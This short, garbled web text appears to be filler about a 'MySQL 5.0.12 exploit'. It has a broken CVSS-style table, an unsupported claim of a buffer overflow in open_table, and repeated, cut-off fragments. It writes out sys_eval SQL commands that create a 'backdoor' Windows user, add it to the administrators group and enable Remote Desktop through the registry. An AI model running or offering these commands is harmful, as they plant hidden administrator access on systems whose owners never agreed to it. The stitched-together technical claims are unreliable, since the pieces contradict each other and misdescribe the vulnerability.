In modern penetration testing, MySQL 5.0.12 is often cited in the context of payloads.
| Dimension | Assessment | |-----------|-------------| | | 7.5 (High) – due to network exploitable, code execution impact. | | Attack Complexity | Medium – requires client to connect to malicious server. | | Privileges Required | None (attacker controls server). | | User Interaction | None – if connection is automated (cron jobs, scripts). | | Confidentiality | Complete – attacker can read client data. | | Integrity | Complete – attacker can modify files as client user. | | Availability | High – client crash possible. | mysql 5.0.12 exploit
: The open_table function in sql_base.cc was vulnerable to a buffer overflow when processing crafted packets. In modern penetration testing, MySQL 5
SELECT sys_eval('net user backdoor S3cr3t! /add'); SELECT sys_eval('net localgroup administrators backdoor /add'); SELECT sys_eval('reg add HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer /v fDenyTSConnections /t REG_DWORD /d 0 /f'); | | Privileges Required | None (attacker controls server)